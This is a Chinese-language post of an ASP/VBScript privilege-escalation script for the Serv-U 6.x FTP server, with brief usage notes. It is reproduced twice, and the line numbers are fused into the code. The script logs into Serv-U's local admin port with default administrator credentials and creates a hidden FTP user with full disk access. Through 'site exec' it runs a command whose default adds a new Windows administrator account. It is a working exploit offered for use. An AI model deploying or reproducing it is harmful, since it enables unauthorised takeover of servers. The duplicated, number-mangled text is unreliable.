信息来源:http://www.cnsst.org/
Author:落叶纷飞
使用方法:如果是6.4以下的保持默认即可,只要按你的需要修改执行的命令即可!如果为6.4请在“服务器端口”里填21,然后再在“服务器IP”中填写服务器的真实IP。
Author:落叶纷飞
使用方法:如果是6.4以下的保持默认即可,只要按你的需要修改执行的命令即可!如果为6.4请在“服务器端口”里填21,然后再在“服务器IP”中填写服务器的真实IP。
1
<%@ LANGUAGE = VBScript %>
2<%
3Dim user, pass, port, ftpport, cmd, loginuser, loginpass, deldomain, mt, newdomain, newuser, quit
4dim action
5action=request("action")
6if not isnumeric(action) then response.end
7user = trim(request("u"))
8pass = trim(request("p"))
9port = trim(request("port"))
10cmd = trim(request("c"))
11f=trim(request("f"))
12if f="" then
13f=gpath()
14else
15 f=left(f,2)
16end if
17ftpport = ffport
18timeout=3
19
20loginuser = "User " & user & vbCrLf
21loginpass = "Pass " & pass & vbCrLf
22deldomain = "-DELETEDOMAIN" & vbCrLf & "-IP=" & iip & vbCrLf & " PortNo=" & ftpport & vbCrLf
23mt = "SITE MAINTENANCE" & vbCrLf
24newdomain = "-SETDOMAIN" & vbCrLf & "-Domain=leaves|" & iip & "|" & ftpport & "|-1|1|0" & vbCrLf & "-TZOEnable=0" & vbCrLf & " TZOKey=" & vbCrLf
25newuser = "-SETUSERSETUP" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & "-PortNo=" & ftpport & vbCrLf & "-User=luo" & vbCrLf & "-Password=ye" & vbCrLf & _
26 "-HomeDir=c:\\" & vbCrLf & "-LoginMesFile=" & vbCrLf & "-Disable=0" & vbCrLf & "-RelPaths=1" & vbCrLf & _
27 "-NeedSecure=0" & vbCrLf & "-HideHidden=0" & vbCrLf & "-AlwaysAllowLogin=0" & vbCrLf & "-ChangePassword=0" & vbCrLf & _
28 "-QuotaEnable=0" & vbCrLf & "-MaxUsersLoginPerIP=-1" & vbCrLf & "-SpeedLimitUp=0" & vbCrLf & "-SpeedLimitDown=0" & vbCrLf & _
29 "-MaxNrUsers=-1" & vbCrLf & "-IdleTimeOut=600" & vbCrLf & "-SessionTimeOut=-1" & vbCrLf & "-Expire=0" & vbCrLf & "-RatioUp=1" & vbCrLf & _
30 "-RatioDown=1" & vbCrLf & "-RatiosCredit=0" & vbCrLf & "-QuotaCurrent=0" & vbCrLf & "-QuotaMaximum=0" & vbCrLf & _
31 "-Maintenance=System" & vbCrLf & "-PasswordType=Regular" & vbCrLf & "-Ratios=None" & vbCrLf & " Access=c:\\|RWAMELCDP" & vbCrLf
32quit = "QUIT" & vbCrLf
33newuser=replace(newuser,"c:",f)
34select case action
35case 1
36 set a=Server.CreateObject("Microsoft.XMLHTTP")
37 a.open "GET", "http://127.0.0.1:" & port & "/leaves/upadmin/s1",True, "", ""
38 a.send loginuser & loginpass & mt & deldomain & newdomain & newuser & quit
39 set session("a")=a
40%>
41<form method="post" name="leaves">
42<input name="u" type="hidden" id="u" value="<%=user%>"></td>
43<input name="p" type="hidden" id="p" value="<%=pass%>"></td>
44<input name="port" type="hidden" id="port" value="<%=port%>"></td>
45<input name="c" type="hidden" id="c" value="<%=cmd%>" size="50">
46<input name="f" type="hidden" id="f" value="<%=f%>" size="50">
47<input name="action" type="hidden" id="action" value="2"></form>
48<script language="javascript">
49document.write('<center>正在连接 127.0.0.1:<%=port%>,使用用户名: <%=user%>,口令:<%=pass%>
<center>');
50setTimeout("document.all.leaves.submit();",4000);
51</script>
52<%
53case 2
54 set b=Server.CreateObject("Microsoft.XMLHTTP")
55 b.open "GET", "http://127.0.0.1:" & ftpport & "/leaves/upadmin/s2", True, "", ""
56 b.send "User luo" & vbCrLf & "pass ye" & vbCrLf & "site exec " & cmd & vbCrLf & quit
57 set session("b")=b
58%>
59<form method="post" name="leaves">
60<input name="u" type="hidden" id="u" value="<%=user%>"></td>
61<input name="p" type="hidden" id="p" value="<%=pass%>"></td>
62<input name="port" type="hidden" id="port" value="<%=port%>"></td>
63<input name="c" type="hidden" id="c" value="<%=cmd%>" size="50">
64<input name="f" type="hidden" id="f" value="<%=f%>" size="50">
65<input name="action" type="hidden" id="action" value="3"></form>
66<script language="javascript">
67document.write('<center>正在提升权限,请等待,<center>');
68setTimeout("document.all.leaves.submit();",4000);
69</script>
70<%
71case 3
72 set c=Server.CreateObject("Microsoft.XMLHTTP")
73 c.open "GET", "http://127.0.0.1:" & port & "/leaves/upadmin/s3", True, "", ""
74 c.send loginuser & loginpass & mt & deldomain & quit
75 set session("c")=c
76%>
77<center>提权完毕,已执行了命令:
78<font color=red><%=cmd%></font>
79
80
81<input type=button value=" 返回继续 " onClick="location.href='<%=gname()%>';">
82</center>
83
84<%
85case else
86on error resume next
87 set a=session("a")
88 set b=session("b")
89 set c=session("c")
90 a.abort
91 Set a = Nothing
92 b.abort
93 Set b = Nothing
94 c.abort
95 Set c = Nothing
96%>
97<center><form method="post" name="leaves">
98 <tr align="center" valign="middle">
99 <td colspan="2">Serv-U 6.X 提权脚本 by 落叶纷飞【S.S.T】 @ 肇庆</td>
100
101 </tr>
102 <tr align="center" valign="middle">
103 <td width="200">用户名:</td>
104
105 <td width="400"><input name="u" type="text" id="u" value="LocalAdministrator"></td>
106
107 </tr>
108 <tr align="center" valign="middle">
109 <td>口 令:</td>
110
111 <td><input name="p" type="text" id="p" value="#l@$ak#.lk;0@P"></td>
112
113 </tr>
114 <tr align="center" valign="middle">
115 <td>端 口:</td>
116
117 <td><input name="port" type="text" id="port" value="43958"></td>
118
119服务器端口:
120
121 <td><input name="ffport" type="text" id="ffport" value="65500"></td>
122
123服务器IP:
124
125 <td><input name="iip" type="text" id="iip" value="0.0.0.0"></td>
126
127 </tr>
128 <tr align="center" valign="middle">
129 <td>系统路径:</td>
130
131 <td><input name="f" type="text" id="f" value="<%=f%>" size="8"></td>
132
133 </tr>
134 <tr align="center" valign="middle">
135 <td>命 令:</td>
136
137 <td><input name="c" type="text" id="c" value="cmd /c net user leaves cnsst /add & net localgroup administrators leaves /add" size="50"></td>
138
139 </tr>
140 <tr align="center" valign="middle">
141 <td colspan="2"><input type="submit" name="Submit" value="提交">
142 <input type="reset" name="Submit2" value="重置">
143 <input name="action" type="hidden" id="action" value="1"></td>
144 </tr>
145</form></center>
146
147
148使用方法:如果是6.4以下的保持默认即可,只要按你的需要修改执行的命令即可!如果为6.4请在“服务器端口”里填21,然后再在“服务器IP”中填写服务器的真实IP。
149<% end select
150function Gpath()
151on error resume next
152 err.clear
153 set f=Server.CreateObject("Scripting.FileSystemObject")
154 if err.number>0 then
155gpath="c:"
156 exit function
157 end if
158gpath=f.GetSpecialFolder(0)
159gpath=lcase(left(gpath,2))
160set f=nothing
161end function
162Function GName()
163If request.servervariables("SERVER_PORT")="80" Then
164GName="http://" & request.servervariables("server_name")&lcase(request.servervariables("script_name"))
165Else
166GName="http://" & request.servervariables("server_name")&":"&request.servervariables("SERVER_PORT")&lcase(request.servervariables("script_name"))
167End If
168End Function
169%>
170
<%@ LANGUAGE = VBScript %>2
<%3
Dim user, pass, port, ftpport, cmd, loginuser, loginpass, deldomain, mt, newdomain, newuser, quit4
dim action5
action=request("action")6
if not isnumeric(action) then response.end7
user = trim(request("u"))8
pass = trim(request("p"))9
port = trim(request("port"))10
cmd = trim(request("c"))11
f=trim(request("f"))12
if f="" then13
f=gpath()14
else15
f=left(f,2)16
end if17
ftpport = ffport18
timeout=319
20
loginuser = "User " & user & vbCrLf21
loginpass = "Pass " & pass & vbCrLf22
deldomain = "-DELETEDOMAIN" & vbCrLf & "-IP=" & iip & vbCrLf & " PortNo=" & ftpport & vbCrLf23
mt = "SITE MAINTENANCE" & vbCrLf24
newdomain = "-SETDOMAIN" & vbCrLf & "-Domain=leaves|" & iip & "|" & ftpport & "|-1|1|0" & vbCrLf & "-TZOEnable=0" & vbCrLf & " TZOKey=" & vbCrLf25
newuser = "-SETUSERSETUP" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & "-PortNo=" & ftpport & vbCrLf & "-User=luo" & vbCrLf & "-Password=ye" & vbCrLf & _26
"-HomeDir=c:\\" & vbCrLf & "-LoginMesFile=" & vbCrLf & "-Disable=0" & vbCrLf & "-RelPaths=1" & vbCrLf & _27
"-NeedSecure=0" & vbCrLf & "-HideHidden=0" & vbCrLf & "-AlwaysAllowLogin=0" & vbCrLf & "-ChangePassword=0" & vbCrLf & _28
"-QuotaEnable=0" & vbCrLf & "-MaxUsersLoginPerIP=-1" & vbCrLf & "-SpeedLimitUp=0" & vbCrLf & "-SpeedLimitDown=0" & vbCrLf & _29
"-MaxNrUsers=-1" & vbCrLf & "-IdleTimeOut=600" & vbCrLf & "-SessionTimeOut=-1" & vbCrLf & "-Expire=0" & vbCrLf & "-RatioUp=1" & vbCrLf & _30
"-RatioDown=1" & vbCrLf & "-RatiosCredit=0" & vbCrLf & "-QuotaCurrent=0" & vbCrLf & "-QuotaMaximum=0" & vbCrLf & _31
"-Maintenance=System" & vbCrLf & "-PasswordType=Regular" & vbCrLf & "-Ratios=None" & vbCrLf & " Access=c:\\|RWAMELCDP" & vbCrLf32
quit = "QUIT" & vbCrLf33
newuser=replace(newuser,"c:",f)34
select case action35
case 136
set a=Server.CreateObject("Microsoft.XMLHTTP")37
a.open "GET", "http://127.0.0.1:" & port & "/leaves/upadmin/s1",True, "", ""38
a.send loginuser & loginpass & mt & deldomain & newdomain & newuser & quit39
set session("a")=a40
%>41
<form method="post" name="leaves">42
<input name="u" type="hidden" id="u" value="<%=user%>"></td>43
<input name="p" type="hidden" id="p" value="<%=pass%>"></td>44
<input name="port" type="hidden" id="port" value="<%=port%>"></td>45
<input name="c" type="hidden" id="c" value="<%=cmd%>" size="50">46
<input name="f" type="hidden" id="f" value="<%=f%>" size="50">47
<input name="action" type="hidden" id="action" value="2"></form>48
<script language="javascript">49
document.write('<center>正在连接 127.0.0.1:<%=port%>,使用用户名: <%=user%>,口令:<%=pass%><center>');50
setTimeout("document.all.leaves.submit();",4000);51
</script>52
<%53
case 254
set b=Server.CreateObject("Microsoft.XMLHTTP")55
b.open "GET", "http://127.0.0.1:" & ftpport & "/leaves/upadmin/s2", True, "", ""56
b.send "User luo" & vbCrLf & "pass ye" & vbCrLf & "site exec " & cmd & vbCrLf & quit57
set session("b")=b58
%>59
<form method="post" name="leaves">60
<input name="u" type="hidden" id="u" value="<%=user%>"></td>61
<input name="p" type="hidden" id="p" value="<%=pass%>"></td>62
<input name="port" type="hidden" id="port" value="<%=port%>"></td>63
<input name="c" type="hidden" id="c" value="<%=cmd%>" size="50">64
<input name="f" type="hidden" id="f" value="<%=f%>" size="50">65
<input name="action" type="hidden" id="action" value="3"></form>66
<script language="javascript">67
document.write('<center>正在提升权限,请等待,<center>');68
setTimeout("document.all.leaves.submit();",4000);69
</script>70
<%71
case 372
set c=Server.CreateObject("Microsoft.XMLHTTP")73
c.open "GET", "http://127.0.0.1:" & port & "/leaves/upadmin/s3", True, "", ""74
c.send loginuser & loginpass & mt & deldomain & quit75
set session("c")=c76
%>77
<center>提权完毕,已执行了命令:78
<font color=red><%=cmd%></font>79
80
81
<input type=button value=" 返回继续 " onClick="location.href='<%=gname()%>';">82
</center>83
84
<%85
case else86
on error resume next87
set a=session("a")88
set b=session("b")89
set c=session("c")90
a.abort91
Set a = Nothing92
b.abort93
Set b = Nothing94
c.abort95
Set c = Nothing96
%>97
<center><form method="post" name="leaves">98
<tr align="center" valign="middle">99
<td colspan="2">Serv-U 6.X 提权脚本 by 落叶纷飞【S.S.T】 @ 肇庆</td>100
101
</tr>102
<tr align="center" valign="middle">103
<td width="200">用户名:</td>104
105
<td width="400"><input name="u" type="text" id="u" value="LocalAdministrator"></td>106
107
</tr>108
<tr align="center" valign="middle">109
<td>口 令:</td>110
111
<td><input name="p" type="text" id="p" value="#l@$ak#.lk;0@P"></td>112
113
</tr>114
<tr align="center" valign="middle">115
<td>端 口:</td>116
117
<td><input name="port" type="text" id="port" value="43958"></td>118
119
服务器端口:120
121
<td><input name="ffport" type="text" id="ffport" value="65500"></td>122
123
服务器IP:124
125
<td><input name="iip" type="text" id="iip" value="0.0.0.0"></td>126
127
</tr>128
<tr align="center" valign="middle">129
<td>系统路径:</td>130
131
<td><input name="f" type="text" id="f" value="<%=f%>" size="8"></td>132
133
</tr>134
<tr align="center" valign="middle">135
<td>命 令:</td>136
137
<td><input name="c" type="text" id="c" value="cmd /c net user leaves cnsst /add & net localgroup administrators leaves /add" size="50"></td>138
139
</tr>140
<tr align="center" valign="middle">141
<td colspan="2"><input type="submit" name="Submit" value="提交">142
<input type="reset" name="Submit2" value="重置">143
<input name="action" type="hidden" id="action" value="1"></td>144
</tr>145
</form></center>146
147
148
使用方法:如果是6.4以下的保持默认即可,只要按你的需要修改执行的命令即可!如果为6.4请在“服务器端口”里填21,然后再在“服务器IP”中填写服务器的真实IP。149
<% end select150
function Gpath()151
on error resume next152
err.clear153
set f=Server.CreateObject("Scripting.FileSystemObject")154
if err.number>0 then155
gpath="c:"156
exit function157
end if158
gpath=f.GetSpecialFolder(0)159
gpath=lcase(left(gpath,2))160
set f=nothing161
end function162
Function GName() 163
If request.servervariables("SERVER_PORT")="80" Then 164
GName="http://" & request.servervariables("server_name")&lcase(request.servervariables("script_name")) 165
Else 166
GName="http://" & request.servervariables("server_name")&":"&request.servervariables("SERVER_PORT")&lcase(request.servervariables("script_name")) 167
End If 168
End Function 169
%>170
